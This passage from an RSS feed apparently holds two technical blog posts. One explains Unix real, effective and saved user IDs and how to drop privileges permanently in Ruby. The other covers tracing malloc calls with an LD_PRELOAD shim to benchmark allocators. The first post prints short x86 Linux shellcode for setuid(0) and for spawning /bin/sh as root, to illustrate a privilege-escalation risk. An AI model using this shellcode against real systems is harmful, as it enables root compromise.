&nbsp; <span class="kw4">Process</span>.<span class="me1">euid</span> = options<span class="br0">&#91;</span><span class="re3">:user</span><span class="br0">&#93;</span> <span class="kw1">if</span> options<span class="br0">&#91;</span><span class="re3">:user</span><span class="br0">&#93;</span><br />
<span class="kw1">end</span></div>
<p></p>
<p>At first glance, you might think this code looks OK. But you&#8217;d be <b>wrong</b>.</p>
<p>Let&#8217;s take a look at 5 things you <i>probably</i> don&#8217;t know about user and group IDs that can lead you to your downfall.</p>
<ol>
<h2>
<li>The difference between real, effective, and saved IDs</li>
</h2>
<p>This is always a bit confusing, but without a solid understanding of this concept you are doomed later.</p>
<ul>
<li>Real ID &#8211; The real ID identifies the user who started the process; a new process inherits it from the process that created it. So, let&#8217;s say you log in to your box as <i>joe</i>: your shell is then launched with its real ID set to <i>joe</i>, and all processes you start from your shell will inherit <i>joe</i> as their real ID.</li>
<li>Effective ID &#8211; The effective ID is the ID that the system uses to determine whether a process can take a particular action. There are two popular ways to change your effective ID:</li>
<ul>
<li><code>su</code> &#8211; the <code>su</code> program changes your effective, real, and saved IDs to the ID of the user you are switching to.</li>
<li>set ID upon execute (abbreviated setuid) &#8211; You can mark a program&#8217;s <i>set uid upon execute bit</i> so that the program runs with its effective and saved ID set to the <i>owner</i> of the program (which may not necessarily be you). The real ID will remain untouched. For example, if you have a program:
<p>
<div class="dean_ch" style="white-space: wrap;">
&#8230;<br />
<span class="me1">rv</span> = getresuid<span class="br0">&#40;</span>&amp;ruid, &amp;euid, &amp;suid<span class="br0">&#41;</span>;<br />
&#8230;<br />
<a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span class="kw3">printf</span></a><span class="br0">&#40;</span><span class="st0">&quot;ruid %d, euid %d, suid %d<span class="es0">\n</span>&quot;</span>, ruid, euid, suid<span class="br0">&#41;</span>;</div>
</p>
<p>
<p>If you then <code>chown</code> the program to root and <code>chmod +s</code> it (which turns on the setuid bit), the program will print:</p>
<pre>ruid 1000, euid 0, suid 0</pre>
</p>
<p>
<p>
when it is run (assuming your user ID is 1000).</p>
</li>
</ul>
<li>Saved ID &#8211; The saved ID is set to the effective ID when the program starts. This exists so that a program can regain its original effective ID after it drops its effective ID to an unprivileged ID. This use-case can cause problems (as we&#8217;ll see soon) if it is not correctly managed.</li>
</ul>
<ul>
<li>If you start a program as yourself, and it does not have its <i>set ID upon execute bit</i> set, then the program will start running with its real, effective, and saved IDs set to your user ID.</li>
<li>If you run a setuid program, your real ID remains unchanged, but your effective and saved IDs are set to the owner of the file.</li>
<li><code>su</code> does the same as running a setuid program, but it also changes your real ID.</li>
</ul>
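<p>Ruby has no direct wrapper for <code>getresuid</code> that I know of, but on Linux you can peek at all three IDs of a process through <code>/proc</code>. This is a Linux-only sketch; the <code>user_ids</code> helper is something I made up for illustration.</p>

```ruby
# Linux-only sketch: the "Uid:" line of /proc/<pid>/status lists the
# real, effective, saved, and filesystem user IDs, in that order.
def user_ids(pid = "self")
  line = File.readlines("/proc/#{pid}/status").find { |l| l.start_with?("Uid:") }
  real, effective, saved, _fs = line.split[1..4].map(&:to_i)
  { real: real, effective: effective, saved: saved }
end

ids = user_ids
puts "ruid #{ids[:real]}, euid #{ids[:effective]}, suid #{ids[:saved]}"
```

<p>Started normally from your shell, all three numbers should be your own user ID, matching the first case in the list above.</p>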
<h2>
<li>Don&#8217;t use Process.euid= in Ruby; stay as far away as possible</li>
</h2>
<ul>
<li>Process.euid= is <b>EXTREMELY platform specific</b>. It might do any of the following:</p>
<ul>
<li>Set just your effective ID.</li>
<li>Set your effective, real, and saved IDs.</li>
</ul>
<p>On most recent Linux kernels, Process.euid= changes <b><u>ONLY</u></b> the Effective ID. In most cases, this is <u><b>NOT</b></u> what you want. Check out <a href="https://gist.github.com/4acbe14306e86001e193">this sample Ruby script</a>. What would happen if you ran this script as root? </li>
<div class="dean_ch" style="white-space: wrap;">
<span class="kw1">def</span> write_file<br />
&nbsp; <span class="kw1">begin</span><br />
&nbsp; &nbsp; <span class="kw4">File</span>.<span class="kw3">open</span><span class="br0">&#40;</span><span class="st0">&quot;/test&quot;</span>, <span class="st0">&quot;w+&quot;</span><span class="br0">&#41;</span> <span class="kw1">do</span> |f|<br />
&nbsp; &nbsp; &nbsp; f.<span class="me1">write</span><span class="br0">&#40;</span><span class="st0">&quot;hello!<span class="es0">\n</span>&quot;</span><span class="br0">&#41;</span><br />
&nbsp; &nbsp; &nbsp; f.<span class="me1">close</span><br />
&nbsp; &nbsp; <span class="kw1">end</span><br />
&nbsp; &nbsp; <span class="kw3">puts</span> <span class="st0">&quot;wrote test file&quot;</span><br />
&nbsp; <span class="kw1">rescue</span> <span class="re2">Errno::EACCES</span><br />
&nbsp; &nbsp; <span class="kw3">puts</span> <span class="st0">&quot;could not write test file&quot;</span><br />
&nbsp; <span class="kw1">end</span><br />
<span class="kw1">end</span><br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;ok, set uid to nobody&quot;</span><br />
<span class="kw4">Process</span>.<span class="me1">euid</span> = Etc.<span class="me1">getpwnam</span><span class="br0">&#40;</span><span class="st0">&quot;nobody&quot;</span><span class="br0">&#41;</span>.<span class="me1">uid</span><br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;going to try to write to / now&#8230;&quot;</span><br />
&nbsp;<br />
write_file<br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;restoring back to root&quot;</span><br />
&nbsp;<br />
<span class="kw4">Process</span>.<span class="me1">euid</span> = <span class="nu0">0</span><br />
&nbsp;<br />
<span class="kw3">puts</span> <span class="st0">&quot;now writing file&quot;</span><br />
&nbsp;<br />
write_file</div>
<p></p>
<p>This might surprise you, but the script <b>regains <code>root</code>&#8217;s ID</b> after it has dropped itself down to <code>nobody</code>.
</p>
<li> Why does this work? </li>
<p>Well, as we just said, Process.euid= doesn&#8217;t touch the Saved ID, only the Effective ID. <b>As a result, the effective ID can be set back to the saved ID at any time. The only way to avoid this is to call a different Ruby function as we&#8217;ll see in #4 below.</b>
</ul>
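<p>One way to reason about this is with a tiny model of the rule: an unprivileged process may switch its effective ID to its real ID or its saved ID, and nothing else. The sketch below is a simplification of what the kernel actually checks, and the UID used for <code>nobody</code> is an assumption (65534 is typical on Linux, but check your own system).</p>

```ruby
# Simplified model of the rule for unprivileged processes: the effective
# ID may be switched to the real ID or the saved ID, and nothing else.
def reachable_effective_ids(real:, effective:, saved:)
  ([real, saved].uniq - [effective]).sort
end

NOBODY = 65_534 # typical uid for "nobody" on Linux; an assumption

# After Process.euid = nobody in a script started as root:
after_euid_only = reachable_effective_ids(real: 0, effective: NOBODY, saved: 0)
# After all three IDs have been changed to nobody:
after_full_drop = reachable_effective_ids(real: NOBODY, effective: NOBODY, saved: NOBODY)

puts "euid-only drop can switch back to: #{after_euid_only.inspect}"
puts "full drop can switch back to:      #{after_full_drop.inspect}"
```

<p>In the first case root (0) is still reachable, which is exactly what the script above takes advantage of. In the second case there is nothing left to switch back to.</p>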
<h2>
<li>Buggy native code running as <code>nobody</code> can execute arbitrary code as <code>root</code> in 8 bytes</li>
</h2>
<ul>
<li>Imagine a Ruby script much like the one above. The script is run as <code>root</code> to do something special (maybe bind to port 80).</li>
<li>The process then drops privileges to <code>nobody</code>.</li>
<li>Afterward, your application interacts with buggy native code in the Ruby interpreter, a Ruby extension, or a Ruby gem.</li>
<li>If that buggy native code can be &#8220;tricked&#8221; into executing arbitrary code, a malicious user can elevate the process up from nobody to root <b>in just 8 bytes.</b> Those 8 bytes are: <i>\x31\xdb\x8d\x43\x17\x99\xcd\x80</i> &#8211; which is i386 Linux machine code that calls setuid(0).</li>
<li>At this point, a malicious user can execute <i>arbitrary code</i> as the <i><code>root</code> user</i>.</li>
</ul>
<p>Let&#8217;s take a look at an (abbreviated) code snippet (<a href="http://gist.github.com/92980">full</a> here):</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="co1">## we&#8217;re using a buggy gem</span><br />
<span class="kw3">require</span> <span class="st0">&#39;badgem&#39;</span></p>
<p><span class="co1"># do some special operations here as the privileged user</span><br />
&#8230;</p>
<p><span class="co1"># ok, now let&#8217;s (incorrectly) drop to nobody</span><br />
<span class="kw4">Process</span>.<span class="me1">euid</span> = Etc.<span class="me1">getpwnam</span><span class="br0">&#40;</span><span class="st0">&quot;nobody&quot;</span><span class="br0">&#41;</span>.<span class="me1">uid</span></p>
<p><span class="co1"># let&#8217;s take some user input</span><br />
s = <span class="re2">MyModule::GetUserInput</span></p>
<p><span class="co1"># let&#8217;s assume the user is malicious and supplies something like:</span><br />
<span class="co1"># &quot;\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52&quot; +</span><br />
<span class="co1"># &quot;\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80&quot;</span><br />
<span class="co1"># as the string. </span><br />
<span class="co1"># That string is x86_32 linux shellcode for running</span><br />
<span class="co1"># setuid(0); and execve(&quot;/bin/sh&quot;, 0, 0) !</span></p>
<p><span class="co1"># pass that to a buggy Ruby Gem</span><br />
BadGem::bad<span class="br0">&#40;</span>s<span class="br0">&#41;</span></p>
<p><span class="co1"># the user is now sitting in a root shell!!</span></div>
<p>
	This is obviously <b><u>NOT GOOD.</u></b>
</p>
<h2>
<li> How to change the real, effective, and saved IDs</li>
</h2>
<p>Each entry in the list below is written as <code>syscall - RubyFunction</code>.</p>
<ul>
<li><code>setuid(uid_t uid) - Process::Sys.setuid(integer)</code></li>
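<p>When the caller has a privileged effective ID, this pair of functions sets the real, effective, and saved user IDs to the value passed in, which makes it useful for permanently dropping privileges, as we&#8217;ll see soon. An unprivileged caller can only use it to switch its effective ID to its real or saved ID. <b>This is a POSIX function. Use this when possible.</b></p>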
<li><code>setresuid(uid_t ruid, uid_t euid, uid_t suid) - Process::Sys.setresuid(rid, eid, sid)</code></li>
<p>This pair of functions allows you to set the real, effective, and saved user IDs to arbitrary values, assuming you have a privileged effective ID. Unfortunately, this function <b>is NOT POSIX</b> and is <b>not portable</b>. It does exist on Linux and some BSDs, though.</p>
<li><code>setreuid(uid_t ruid, uid_t eid) - Process::Sys.setreuid(rid, eid)</code></li>
<p>This pair of functions allows you to set the real and effective user IDs to the values passed in. On Linux:
<ul>
<li>A process running with an unprivileged effective ID can only set the real ID to its current real ID or effective ID.</li>
<li>The saved ID is set to the new effective ID <b>if</b> the real ID is set at all, or if the effective ID is set to a value other than the previous real ID.</li>
</ul>
<p><b>This is a POSIX function, but has lots of cases with undefined behavior. Be careful.</b></p>
<li><code>seteuid(uid_t eid) - Process::Sys.seteuid(eid)</code></li>
<p>This pair of functions sets the effective ID of the process but leaves the <b>real and saved IDs unchanged. IMPORTANT: Any process (including those with an unprivileged effective ID) may change its effective ID to its real or saved ID.</b> This is exactly the behavior we saw with the Ruby script in #2 above. <b>This is a POSIX function.</b></p>
</ul>
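<p>To make the difference between these calls concrete, here is a toy model in plain Ruby. It makes no system calls and needs no privileges. The <code>Creds</code> struct, its method names, and the <code>NOBODY</code> value are made up for illustration, and the rules are a simplified reading of the Linux behavior described above (<code>setreuid</code> and <code>setresuid</code> are left out).</p>

```ruby
# Toy model of a process's user IDs. No real system calls are made.
# Creds and its methods are hypothetical names for this sketch only.
Creds = Struct.new(:ruid, :euid, :suid) do
  def privileged?
    euid.zero?
  end

  # Models seteuid(2): only the effective ID changes.
  def seteuid(uid)
    allowed = privileged? || [ruid, euid, suid].include?(uid)
    raise Errno::EPERM unless allowed
    self.euid = uid
    self
  end

  # Models setuid(2): a privileged caller changes all three IDs,
  # an unprivileged caller can only switch its effective ID.
  def setuid(uid)
    if privileged?
      self.ruid = self.euid = self.suid = uid
    elsif [ruid, suid].include?(uid)
      self.euid = uid
    else
      raise Errno::EPERM
    end
    self
  end
end

NOBODY = 65_534 # assumed UID for "nobody"; it varies between systems

# Temporary drop: the real and saved IDs are still 0, so root comes back.
temp = Creds.new(0, 0, 0).seteuid(NOBODY)
temp.seteuid(0)
puts "after seteuid drop and restore: euid=#{temp.euid}"

# Permanent drop: all three IDs change, so there is no way back.
perm = Creds.new(0, 0, 0).setuid(NOBODY)
begin
  perm.setuid(0)
rescue Errno::EPERM
  puts "after setuid drop: regaining root fails with EPERM"
end
```

<p>The first case is the <code>Process.euid=</code> mistake in miniature: the saved ID never changed, so anything running inside the process can switch back to root.</p>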
<h2>
<li>How to correctly and permanently drop privileges</li>
</h2>
<p>You should use one of the following pairs of functions:</p>
<ul>
<li><code>setuid(uid_t uid) - Process::Sys.setuid(integer)</code></li>
<li><code>setresuid(uid_t ruid, uid_t euid, uid_t suid) - Process::Sys.setresuid(rid, eid, sid)</code></li>
</ul>
<p>Either one can set the real, effective, and saved IDs to the least-privileged ID possible. On many systems, this is the ID of the user <code>nobody</code>.</p>
<p>For the truly paranoid, it is recommended to check that dropping privileges <i>was actually</i> successful before continuing. For example:</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="kw3">require</span> <span class="st0">&#39;etc&#39;</span></p>
<p><span class="co1"># returns true only if root cannot be regained</span><br />
<span class="kw1">def</span> test_drop<br />
&nbsp; <span class="kw1">begin</span><br />
&nbsp; &nbsp; <span class="re2">Process::Sys</span>.<span class="me1">setuid</span><span class="br0">&#40;</span><span class="nu0">0</span><span class="br0">&#41;</span><br />
&nbsp; <span class="kw1">rescue</span> <span class="re2">Errno::EPERM</span><br />
&nbsp; &nbsp; <span class="kw2">true</span><br />
&nbsp; <span class="kw1">else</span><br />
&nbsp; &nbsp; <span class="kw2">false</span><br />
&nbsp; <span class="kw1">end</span><br />
<span class="kw1">end</span></p>
<p>uid = Etc.<span class="me1">getpwnam</span><span class="br0">&#40;</span><span class="st0">&quot;nobody&quot;</span><span class="br0">&#41;</span>.<span class="me1">uid</span><br />
<span class="re2">Process::Sys</span>.<span class="me1">setuid</span><span class="br0">&#40;</span>uid<span class="br0">&#41;</span></p>
<p><span class="kw1">unless</span> test_drop<br />
&nbsp; <span class="kw3">puts</span> <span class="st0">&quot;Failed!&quot;</span><br />
&nbsp; <span class="co1"># handle the error; do not keep running with privileges</span><br />
<span class="kw1">end</span></div>
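<p>The same check can be folded into a small helper that refuses to continue if the drop did not stick. This is only a sketch: <code>drop_privileges!</code> and its <code>sys</code> parameter are names invented here (the parameter exists so the logic can be exercised with a stand-in object instead of real system calls), and it deals with user IDs only.</p>

```ruby
require 'etc'

# Hypothetical helper: permanently switch to target_uid, then verify.
# `sys` defaults to Process::Sys; it is a parameter only so the logic
# can be tried with a stand-in object that makes no real system calls.
def drop_privileges!(target_uid, sys: Process::Sys)
  raise ArgumentError, "refusing to 'drop' to root" if target_uid.zero?

  sys.setuid(target_uid)

  # The real and effective IDs must both be the unprivileged ID now.
  unless sys.getuid == target_uid && sys.geteuid == target_uid
    raise SecurityError, "IDs were not changed"
  end

  # Regaining root must fail; if it succeeds, the drop was not permanent.
  begin
    sys.setuid(0)
  rescue Errno::EPERM
    return true
  end
  raise SecurityError, "was able to regain root"
end

# Intended use, early in a program that starts as root:
#   drop_privileges!(Etc.getpwnam("nobody").uid)
```

<p>Raising instead of returning <code>false</code> is a deliberate choice in this sketch: a caller that forgets to check the result still cannot carry on with root privileges.</p>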
</ol>
<h2>Conclusion</h2>
<p>*nix user and group ID management is confusing, difficult, and extremely error-prone. The system has many nuances, gotchas, and caveats, so it is no wonder that so many people make mistakes when trying to write secure code. The major things to keep in mind from this article are:</p>
<ul>
<li>Avoid <code>Process.euid=</code> at <b>all costs.</b></li>
<li>Drop privileges as soon as possible in your application.</li>
<li>Drop those privileges <i>permanently</i>.</li>
<li>Ensure that privileges were correctly dropped.</li>
<li><b>Carefully</b> read and re-read <code>man</code> pages when using the functions listed above.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/5-things-you-dont-know-about-user-ids-that-will-destroy-you/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>a/b test mallocs against your memory footprint</title>
		<link>http://timetobleed.com/ab-test-mallocs-against-your-memory-footprint/</link>
		<comments>http://timetobleed.com/ab-test-mallocs-against-your-memory-footprint/#comments</comments>
		<pubDate>Tue, 17 Mar 2009 01:39:42 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[debugging]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[scaling]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[allocator]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[malloc]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[profiling]]></category>
		<category><![CDATA[system health]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=317</guid>
		<description><![CDATA[The other day at Kickball Labs we were discussing whether linking Ruby against tcmalloc (or ptmalloc3, nedmalloc, or any other malloc) would have any noticeable effect on application latency. After taking a side in the argument, I started wondering how we could test this scenario. We had a couple different ideas about testing: Look at [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/brain.jpg"/></center><br />
</p>
<p>The other day at Kickball Labs we were discussing whether linking Ruby against tcmalloc (or ptmalloc3, nedmalloc, or any other malloc) would have any noticeable effect on application latency. After taking a side in the argument, I started wondering how we could test this scenario.</p>
<p>We had a few different ideas about testing:</p>
<ul>
<li><b>Look at other people&#8217;s benchmarks</b><br />BUT do the memory workloads tested in the benchmarks actually match our own workload at all?</li>
<li><b>Run different allocators on different Ruby backends</b><br />BUT different backends will get different users who will use the system differently and cause different allocation patterns</li>
<li><b>Try to recreate our application&#8217;s memory footprint and test that against different mallocs</b><br />
BUT how?</li>
</ul>
<p>I decided to explore <strong>the last option</strong> and came up with an interesting solution. Let&#8217;s dive into how to do this.</p>
<h2>Get the code:</h2>
<p><a href="http://github.com/ice799/malloc_wrap/tree/master">http://github.com/ice799/malloc_wrap/tree/master</a><br />
</p>
<h2>Step 1: We need to get a memory footprint of our process</h2>
<p>So we have some random binary (in this case it happens to be a Ruby interpreter, but it could be anything) and we&#8217;d like to track when it calls malloc/realloc/calloc and free (from now on I&#8217;ll refer to all of these as malloc-family for brevity). There are two ways to do this: the right way and the wrong/hacky/unsafe way.</p>
<ul>
<li>
<h3>The &#8220;right&#8221; way to do this, with libc malloc hooks:</h3>
<p>Edit your application code to use the malloc debugging hooks provided by libc. When a malloc-family function is called, your hook executes and outputs to a file which function was called and what arguments were passed to it.</li>
<li>
<h3>The &#8220;wrong/hacky/unsafe&#8221; way to do this, with LD_PRELOAD:</h3>
<p>Create a shim library and point LD_PRELOAD at it. The shim exports the malloc-family symbols, and when your application calls one of those functions, the shim code gets executed. The shim logs which function was called and with what arguments. The shim then calls the libc version of the function (so that memory is actually allocated/freed) and returns control to the application.</li>
</ul>
<p>I chose to do it <strong>the second way</strong>, because I like living on the edge. <strong>The second way is unsafe because you can&#8217;t call any functions which use a malloc-family function before your hooks are set up. If you do, you can end up in infinite recursion and crash the application.</strong></p>
<p>You can check out my implementation for the shim library here: <a href="http://github.com/ice799/malloc_wrap/blob/master/malloc_wrap.c">malloc_wrap.c</a></p>
<h3> Why does your shim output such weirdly formatted data?</h3>
<p>The answer is sort of complicated, but let&#8217;s keep it simple: I originally had a different idea about how I was going to use the output. When that first try failed, I tried something else and translated the data to the format I needed it in, instead of rewriting the shim. What can I say, I&#8217;m a lazy programmer.</p>
<p>OK, so once you&#8217;ve built the shim (<b>gcc -O2 -Wall -fPIC -shared -o malloc_wrap.so malloc_wrap.c -ldl</b>), you can launch your binary like this:</p>
<div class="dean_ch" style="white-space: wrap;">% <span class="re2">LD_PRELOAD=</span>/path/to/shim/malloc_wrap.so /path/to/your/binary -your -args</div>
<p>You should now see output in /tmp/malloc-footprint.pid</p>
<h2>Step 2: Translate the data into a more usable format</h2>
<p>Yeah, I should have gone back and rewritten the shim, but nothing happens exactly as planned. So, I wrote a quick Ruby script to convert my output into a more usable format. The script sorts through the output and renames memory addresses to unique integer IDs starting at 1 (0 is hardcoded to NULL).</p>
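<p>The renaming step is the heart of the conversion. A minimal sketch of the idea follows. The class and method names are invented for this example, addresses are assumed to arrive as hex strings such as <code>0x1f3a010</code> (which may not match what the shim actually writes), and handing out a fresh ID when an address is reused is a choice made here, not something taken from the real script.</p>

```ruby
# Maps raw pointer values to small integer IDs, starting at 1.
# ID 0 is reserved for NULL. AddressRenamer is a hypothetical name.
class AddressRenamer
  def initialize
    @ids = {}      # live address => ID
    @next_id = 1
  end

  # Called for a pointer returned by malloc/calloc/realloc.
  def assign(addr)
    key = addr.hex
    return 0 if key.zero?   # a NULL return stays 0
    id = @next_id
    @next_id += 1
    @ids[key] = id
  end

  # Called for a pointer passed to free/realloc. Hands back the ID that
  # was assigned and forgets it, since the allocator may reuse the address.
  def release(addr)
    key = addr.hex
    return 0 if key.zero?   # free(NULL) is legal
    @ids.delete(key)        # nil if the address was never seen
  end
end

renamer = AddressRenamer.new
a = renamer.assign("0x1f3a010")   # first block
b = renamer.assign("0x1f3a050")   # second block
renamer.release("0x1f3a010")      # first block freed
c = renamer.assign("0x1f3a010")   # same address, treated as a new block
puts [a, b, c].inspect
```

<p>Working with IDs instead of addresses is what makes the trace replayable: a different allocator will return different pointers, but block number 3 is still block number 3.</p>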
<p>The format is pretty simple. The first line of the file has the number of calls to malloc-family functions, followed by a blank line, and then the memory footprint. Each line of the memory footprint has 1 character which represents the function called followed by a few arguments. For the free() function, there is only one argument, the ID of the memory block to free. malloc/calloc/realloc have different arguments, but the first argument following the one character is always the ID of the return value. The next arguments are the arguments usually passed to malloc/calloc/realloc in the same order.</p>
<p>Have a look at my ruby script here: <a href="http://github.com/ice799/malloc_wrap/blob/master/build_trace_file.rb">build_trace_file.rb</a></p>
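<p>For a feel of how a file in this layout can be consumed, here is a small reader that tallies calls and requested bytes. It is a sketch under assumptions: the one-letter codes (<code>m</code>, <code>c</code>, <code>r</code>, <code>f</code>), the <code>OPS</code> table, and the function name are guesses for illustration, so check <code>build_trace_file.rb</code> for what is really emitted.</p>

```ruby
require 'stringio'

# Assumed one-letter codes; the real converter may use different ones.
OPS = { "m" => :malloc, "c" => :calloc, "r" => :realloc, "f" => :free }.freeze

# Reads a converted trace from any IO object, one line at a time.
def summarize_trace(io)
  expected = Integer(io.gets.strip)   # line 1: number of calls
  io.gets                             # line 2: blank separator
  calls = Hash.new(0)
  bytes_requested = 0

  io.each_line do |line|
    op, *args = line.split
    next if op.nil?                   # tolerate stray blank lines
    name = OPS.fetch(op)
    args = args.map { |a| Integer(a) }
    calls[name] += 1

    case name
    when :malloc  then bytes_requested += args[1]            # id, size
    when :calloc  then bytes_requested += args[1] * args[2]  # id, nmemb, size
    when :realloc then bytes_requested += args[2]            # new id, old id, size
    end                                                      # free: id only
  end

  { expected: expected, calls: calls, bytes_requested: bytes_requested }
end

sample = StringIO.new("4\n\nm 1 64\nc 2 10 8\nr 3 1 128\nf 2\n")
puts summarize_trace(sample).inspect
```

<p>Because the reader streams line by line, the same function can be pointed at a multi-gigabyte file with <code>File.open(path) { |f| summarize_trace(f) }</code> without loading it into memory.</p>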
<p>It might take a while to convert your data to this format, so I suggest running this in a <a href="http://www.gnu.org/software/screen/">screen</a> session, especially if your memory footprint data is large. Just as a warning, we collected 15 *gigabytes* of data over a 10 hour period. This script took *10 hours* to convert the data. We ended up with a 7.8 gigabyte file.</p>
<div class="dean_ch" style="white-space: wrap;">% ruby /path/to/script/build_trace_file.rb /path/to/raw/malloc-footprint.PID /path/to/converted/my-memory-footprint</div>
<h2>Step 3: Replay the allocation data with different allocators and measure time and memory usage</h2>
<p>OK, so we now have a file which represents the memory footprint of our application. It&#8217;s time to build the replayer, link against your malloc implementation of choice, fire it up and start measuring time spent in allocator functions and memory usage.</p>
<p>Have a look at the replayer here: <a href="http://github.com/ice799/malloc_wrap/blob/master/alloc_tester.c">alloc_tester.c</a><br />
Build the replayer: <b>gcc -ggdb -Wall -fPIC -o tester alloc_tester.c -ldl</b></p>
<h3>Use ltrace</h3>
<p>ltrace is similar to <a href="http://timetobleed.com/hello-world/">strace</a>, but for library calls. You can use <code>ltrace -c</code> to sum the amount of time spent in different library calls and output a cool table at the end. It will look something like this:</p>
<pre>
% time     seconds  usecs/call     calls      function
------ ----------- ----------- --------- --------------------
 86.70   37.305797          62    600003 fscanf
 10.64    4.578968          33    138532 malloc
  2.36    1.014294          18     55263 free
  0.25    0.109550          18      5948 realloc
  0.03    0.011407          45       253 printf
  0.02    0.010665          42       252 puts
  0.00    0.000167          20         8 calloc
  0.00    0.000048          48         1 fopen
------ ----------- ----------- --------- --------------------
100.00   43.030896                800260 total</pre>
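<p>In this sample most of the time goes to <code>fscanf</code>, which is presumably the replayer reading the trace file rather than the allocator doing work. When comparing allocators it helps to pull out just the malloc-family rows. A small sketch, assuming the column layout shown above; the helper name is made up:</p>

```ruby
ALLOC_FUNCS = %w[malloc calloc realloc free].freeze

# Sums the "seconds" column over the malloc-family rows of `ltrace -c`
# output. allocator_seconds is a hypothetical helper name.
def allocator_seconds(table)
  table.each_line.sum(0.0) do |line|
    fields = line.split
    # Data rows have 5 fields: % time, seconds, usecs/call, calls, function.
    # The header, separator, and total rows fail this check and add nothing.
    next 0.0 unless fields.size == 5 && ALLOC_FUNCS.include?(fields[4])
    Float(fields[1])
  end
end

# The sample table from above.
SAMPLE = <<~TABLE
  % time     seconds  usecs/call     calls      function
  ------ ----------- ----------- --------- --------------------
   86.70   37.305797          62    600003 fscanf
   10.64    4.578968          33    138532 malloc
    2.36    1.014294          18     55263 free
    0.25    0.109550          18      5948 realloc
    0.03    0.011407          45       253 printf
    0.02    0.010665          42       252 puts
    0.00    0.000167          20         8 calloc
    0.00    0.000048          48         1 fopen
  ------ ----------- ----------- --------- --------------------
  100.00   43.030896                800260 total
TABLE

puts format("time in malloc-family calls: %.6f s", allocator_seconds(SAMPLE))
```

<p>Running the replayer once per allocator and comparing this one number is a fairer comparison than the grand total, since the file-reading overhead is the same in every run.</p>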
<h2>Conclusion</h2>
<p>Using a different malloc implementation can improve speed or memory usage, depending on your allocation patterns. Hopefully the code provided will help you test different allocators to determine whether or not swapping out the default libc allocator is the right choice for you. Our results are still pending; we had a lot of allocator data (15g!) and it takes several hours to replay the data with just one malloc implementation. Once we&#8217;ve gathered some data about the different implementations and their effects, I&#8217;ll post the results and some analysis. As always, stay tuned and thanks for reading!</p>
]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/ab-test-mallocs-against-your-memory-footprint/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

